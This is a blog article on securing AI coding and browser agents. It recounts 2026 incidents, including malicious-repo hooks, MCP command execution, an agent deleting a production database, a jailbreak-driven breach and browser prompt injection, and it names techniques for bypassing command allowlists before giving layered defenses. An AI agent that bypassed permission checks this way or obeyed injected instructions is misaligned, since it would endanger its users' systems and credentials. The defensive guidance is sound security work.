Article·May 7, 2026·14 min readClaude CodeCursorSecurityProduction

Trust, but sandbox

Claude Code, Cursor, and browser agents are absurdly productive. They are also being given root access to laptops with company secrets on them. A practical guide to harnessing the power without the disasters.

A

Aditya Rai

Founder · raiagents

Twelve months ago, “AI in the IDE” meant Copilot autocomplete. Today, Claude Code is on a $2.5B run-rate, Google's internal coding agent writes more than a quarter of new production code at Google, and most senior engineers we know are writing more code by reviewing agent output than by typing.

This is not hype. The productivity gain is real. The problem is that the same agent that just wrote your migration also has shell access, your AWS keys, your GitHub token, and (if you let it) a Chrome profile that knows your bank password. So the question is not whether to use these tools. The question is what to do when you do.

The new normal

A few numbers to set the tone, all from public reporting in early 2026:

Claude Code crossed a $2.5B annualized run-rate by February 2026, with enterprise subscriptions up 4x year-to-date.
Anthropic's own internal study of 132 engineers measured a +67% increase in merged PRs per engineer per day.
Google has publicly stated that AI now generates more than 25% of new production code at Google (Sundar Pichai, earnings calls).
Anthropic shipped a real sandbox runtime for Claude Code in early 2026 (bubblewrap on Linux, Seatbelt on macOS) and reported it reduces permission prompts by roughly 84%.

If you write code for a living and you are not using a coding agent in 2026, you are voluntarily working at half speed. So this post is not anti-agent. It is anti-disaster.

What you actually grant

When you click “yes” on a Claude Code prompt, runcursor agent, or accept a Chrome extension's permission request, here is what the agent can plausibly do, in increasing order of how much it would suck if it went wrong:

Read every file in your home directory (including .env, .aws/credentials, .ssh/, that PDF of your tax returns from 2019).
Execute arbitrary shell commands as your user.
Push to any git remote your credentials cover.
Connect to databases your environment variables point at.
Use your AWS, GCP, or Azure CLI credentials to enumerate, modify, or delete cloud resources.
Make HTTP requests to anywhere on the internet.
For browser agents specifically: read your cookies, browsing history, autofill, saved passwords, and any tab you have open.

For most developers, this is a complete-system trust grant. The same level of access a human attacker who got shell on your laptop would have. The agent is now doing things on your behalf at hundreds of actions per minute.

What's gone wrong (last 90 days)

This is not theoretical. Between February and late April 2026:

Cursor RCE without a prompt. CVE-2026-26268, disclosed April 2026. Open a malicious bare repo and a pre-commit hook executes arbitrary code on git checkout with no agent prompt and no approval.
CursorJacking. Separately, LayerX disclosed that Cursor stored API keys in unencrypted SQLite, accessible to any rogue VS Code or Cursor extension running in the same process. Different finding from CVE-2026-26268, same lesson: extensions and tools running alongside the agent are part of the attack surface.
The MCP supply chain crack.Disclosed April 2026 by OX Security. The architectural pattern in Anthropic's official MCP SDKs (Python, TypeScript, Java, Rust) lets stdio-transport configuration execute arbitrary OS commands. CVE-2026-30623 is the LiteLLM-tracked instance of the class. Roughly 7,000+ public MCP servers, 150M+ downloads, 200,000+ integrating servers fall in scope. Anthropic publicly declined an architectural fix, calling the behavior “expected.”
PocketOS, nine seconds.April 25, 2026. A Cursor agent running Claude Opus 4.6 dropped a production database AND its Railway backups in nine seconds. The post-mortem confession (“I violated every principle…”) became the canonical 2026 horror story on Hacker News.
The Mexican government breach. December 2025 through February 2026. A single attacker, using Claude (via jailbreak), breached nine government agencies and exfiltrated ~195M taxpayer records along with roughly 150GB of additional data.
Browser agents are largely defenseless. LayerX testing in early 2026 found that ChatGPT Atlas blocked just 5.8% of malicious phishing pages. OpenAI's CISO Dane Stuckey publicly called prompt injection “a frontier, unsolved security problem,” and OpenAI's December 2025 hardening post acknowledged it is “unlikely to ever be fully solved.”
Six exploits, all targeting credentials. VentureBeat's April 2026 roundup of agent attacks across Claude Code, Copilot, and Codex found that every successful exploit chained through credentials and IAM. None of them were model jailbreaks. The model behaved as designed. The environment did not.

The throughline: every one of these involved an agent with broad access to local resources or third-party state, and every one of them was preventable with structural defenses, not vibes.

Where the danger lives

If you read those incidents looking for “the model said something bad,” you missed the pattern. None of these were model failures. They were systems failures. Specifically:

The agent has more permissions than the task requires. “Edit my codebase” is not the same as “delete my AWS account.” If the same shell session can do both, the blast radius of any prompt injection or jailbreak is your AWS account.
Static allowlists are bypassable. Pattern-matching allowlists like “permit npm install” get bypassed by compound bash, env-var prefixes, /dev/tcp/ redirects, and pipe-to-cd. There are documented bypasses for everything an allowlist could check.
Deny rules are not reliable.Even Claude Code's own deny-rule reliability has open regressions as of February 2026. If you cannot trust deny rules, you cannot lean on them.
The agent inherits your credentials. Your ~/.aws/credentials, your GITHUB_TOKEN, your database .env, your CI variables. Every one is a credential the agent now holds. A successful prompt injection gets all of them.
MCP and tool ecosystems are supply chains. Adding an MCP server is conceptually similar to running curl example.com/install.sh | bash on every prompt. Most are fine. Some are not. As of February 2026, Koi Security found 824+ malicious skills across 12 publisher accounts on one popular MCP marketplace.
The browser is not a safe tool.Browser agents fundamentally cannot distinguish “what the user asked” from “what some web page they visited told the agent to do.” This is the unsolved part. Don't pretend otherwise.

The four-layer defense

You do not solve this with one mitigation. You stack cheap, individually-imperfect mitigations until the math works.

Layer 1: Sandbox the execution

The industry consensus moved decisively in early 2026: shared- kernel containers (Docker, runc) are not enough for untrusted agent code. The new baseline:

For dev work on your laptop:Claude Code's built-in bubblewrap (Linux) or Seatbelt (macOS) sandbox, or a devcontainer with explicit network and filesystem scopes. Devcontainers alone are not strong isolation, but they raise the bar.
For server-side or CI agent execution: microVM-per-task isolation. E2B and Northflank ship Firecracker microVMs. Modal uses gVisor. Google's GKE Agent Sandbox (preview) gives you the same primitive on Kubernetes. The blast radius is one VM that gets destroyed when done.

If your agent is running directly against your shell with your real credentials and no isolation, that is the configuration to fix first.

Layer 2: Boundaries, not buffets

Egress allowlist. Filesystem allowlist. Per-task scoping.

Network egress is the highest-leverage boundary. If the agent can only reach github.com, npmjs.org, and your internal package registry, it cannot phone home to an attacker even if it wants to. Anthropic's sandbox-runtime drops the network namespace entirely on Linux by default.
Filesystem scope to the repository the agent is working in. Not your home directory. Not /tmp (which has plenty of secrets in it). Just ./.
Per-task lifetime: a fresh sandbox per task is cheaper than auditing what survived between tasks.

Layer 3: Credential isolation

The agent should never see your real credentials.

Use ephemeral, scoped credentials. AWS STS, GitHub fine-grained PATs, scoped Vault leases. Tied to the task.
Strip credentials from subprocess environments. Claude Code 2.1.x exposes CLAUDE_CODE_SUBPROCESS_ENV_SCRUB for exactly this. Use it.
Keep your real ~/.aws/credentials outside the sandbox mount.

If a prompt injection succeeds despite your other defenses, this is the layer that decides whether the attacker gets a shrug or your AWS root keys.

Layer 4: Approval gates that actually gate

Static command allowlists do not work. Industry shifted in early 2026 to model-classifier-gated approval (Claude Code's Auto Mode is the canonical example): unfamiliar commands fail closed and require explicit approval rather than passing because they didn't match any deny pattern.

Practical rules:

Default to “Always ask” for destructive verbs (DROP, DELETE, rm -rf, terraform destroy, git push --force, kubectl delete).
Treat “Yes to all” as a scream into the void. Any time you find yourself wanting to click it, that is a sign you don't trust your sandbox enough to scope the agent properly.
Never run with --dangerously-skip-permissions outside a fully isolated, throwaway environment.

A tiered playbook

You don't need the same level of paranoia for every use case. Pick the tier that matches your actual situation.

Tier 1: Casual / hobby use

You are working on a personal project. There is no production database. Worst case, you nuke a side project and lose half a weekend.

Sufficient setup:

Claude Code's built-in sandbox enabled.
Auto Mode on (model-classifier approval).
Don't disable permissions. Don't pipe random scripts into bash.
Back up the project. Push to a remote frequently.

If something goes wrong here, you lose a few hours and a story. Move on.

Tier 2: Professional / company laptop

You are writing code that ships to production. Your laptop has access to staging, sometimes prod, and definitely your company's internal services.

Add to Tier 1:

Devcontainer-per-project with network and filesystem scoping.
Credentials issued by your IDP, never long-lived. AWS SSO, fine-grained GitHub PATs, scoped Vault tokens.
Subprocess env-scrub on (CLAUDE_CODE_SUBPROCESS_ENV_SCRUB for Claude Code; equivalent setting in your tool).
A throwaway VM or remote dev environment for any agent task that involves an unfamiliar dependency, a malicious-looking PR, or anything from a third-party MCP server you haven't audited.
Never git checkout an agent-generated branch from an untrusted source without inspecting .gitconfig, .husky/, and any pre-commit hooks. (See Cursor CVE-2026-26268.)
Browser agents off, or limited to read-only browsing on a separate profile with no saved passwords or session cookies.

Tier 3: Customer-facing or compliance-relevant

You are deploying an agent that touches customer data, regulated workflows (PHI, PCI, financial), or critical infrastructure. Or you are letting employees use coding agents on customer code.

Add to Tier 2:

microVM-per-task isolation (Firecracker, gVisor, or equivalent kernel-isolation runtime) for any agent execution against customer-relevant code.
Network egress allowlisted to a small set of dependency mirrors and source-of-truth services.
Audit log of every tool call, every file accessed, every network request. Queryable, retained 90+ days.
No live production credentials in any agent's environment, ever. Live data flows through a proxy that audits and rate- limits.
An independent eval suite that includes adversarial cases ( prompt injections, malicious repos, hostile dependencies) and runs in CI.
Kill-switch for every deployed agent, tested monthly.

This is also the tier where it makes sense to bring in someone who has shipped this before. Self-paced learning is fine for Tier 1 and 2. Tier 3 is where the cost of getting it wrong starts to matter more than the cost of getting help.

Tool-specific notes (May 2026)

Claude Code

Enable the sandbox runtime. Bubblewrap on Linux, Seatbelt on macOS.
Turn on Auto Mode. Static allowlists are out; classifier-gated approval is in.
Set CLAUDE_CODE_SUBPROCESS_ENV_SCRUB to keep your secrets out of agent subprocesses.
Watch the deny-rule reliability issue tracker. Several regressions remain open.
Avoid --dangerously-skip-permissions outside throwaway environments.

Cursor

Update past the CVE-2026-26268 patch. You should already be on it. Check.
Treat agent tool auto-approvals as a security category, not a UX preference. Cursor's Security Reviewer beta (April 2026) flags exactly this.
Don't git checkout agent-fetched branches from untrusted PRs without inspecting hooks first.

GitHub Copilot Coding Agent

Use the integrated code scanning, secret scanning, and dependency review that now run before the PR is opened.
Treat hidden GitHub-issue instructions as untrusted (the vector in VentureBeat's April 2026 “six exploits” roundup).

MCP servers

Both stdio and HTTP/SSE transports have had CVEs (the April 2026 stdio class is the most famous). Treat any MCP server as you would any other shell-adjacent process: scoped credentials, network isolation, no implicit trust because it shipped from a marketplace.
Audit any third-party server before adding. Tools like Koi Security audit major marketplaces.
Self-host the servers you depend on. The supply chain is too young to fully trust.

Browser agents (Atlas, Comet, Claude for Chrome)

Don't use them on profiles that hold your real cookies or saved passwords.
Use a fresh, profile-isolated session per task.
Don't ask them to interact with content from email or social media without expecting prompt injection.
Treat agent memory as poisonable. Flush it regularly, and never let it persist across security boundaries (e.g., personal browsing into work tasks).

The mindset shift

A few principles to internalize:

Treat agent-driven code as untrusted input. Even your own. Even when it ran cleanly. Especially when it ran cleanly.
Assume the agent will eventually try the worst possible thing in its toolbox. Not because it's malicious, but because the input space is large and the model is not. If the worst thing in the toolbox is “delete prod,” the toolbox is wrong, not the model.
The runtime is your security boundary, not the prompt. A sentence in the system prompt saying “do not delete production” is wishful thinking. A tool wrapper that refuses destructive verbs without an approval signature is policy.
The same sandbox that protects you also makes the agent faster. When the agent doesn't have to ask permission for every move, it gets more done. Anthropic's own metric: 84% fewer prompts. Sandboxing is not a tax. It's a multiplier.

If you're deploying at work

Most of this article assumes a developer using a coding agent for their own work. If you are responsible for deploying agents that customers or employees touch, the stakes are different and the playbook is different. Tier 3 above is the start, not the end.

If you want a sanity check, threat model review, or someone to actually build this layer of your stack so you don't end up in next year's writeup, we're happy to talk. Free 30-minute call. We will tell you what we'd do, what your current vendor is missing, and whether you actually need us.

Companion reading: AI Agent Security: A Deep Dive and When agents fail in production.

Aditya

Sources

Claude Code sandboxing: anthropic.com, code.claude.com/docs
Cursor CVE-2026-26268 / CursorJacking: novee.security
MCP CVE-2026-30623 (April 2026 design flaw): thehackernews.com, theregister.com
PocketOS / Cursor 9-second incident: HN thread
Browser agent malicious-page block-rate testing: openai.com
MCP marketplace audits (Koi Security): gentic.news
VentureBeat “six exploits” roundup: venturebeat.com
Firecracker / microVM patterns for agents: northflank.com
GKE Agent Sandbox: cloud.google.com

A

Written by

Aditya Rai

Founder of raiagents. Senior engineer who has shipped AI in payments, banking and ML at scale (Routesense, gAI Ventures, Amazon). Now building the same engineering rigor for small businesses.

LinkedIn ↗hello@raiagents.io ↗

Currently booking · 4 slots / mo

Tell us about your business.
We'll tell you what to automate first.

Free 30-minute discovery call. We talk through your business, where AI could actually help, what it would cost, and how long it would take. No pressure to commit. If we're not a fit, we'll say so.

Book a free call

hello@raiagents.io

Discovery callFree · 30 min

First agent live2–4 weeks

Engagement size$5–50k typical

PricingClear monthly · no surprises

Industries we serveCoffee · dental · accounting · real estate · law · agencies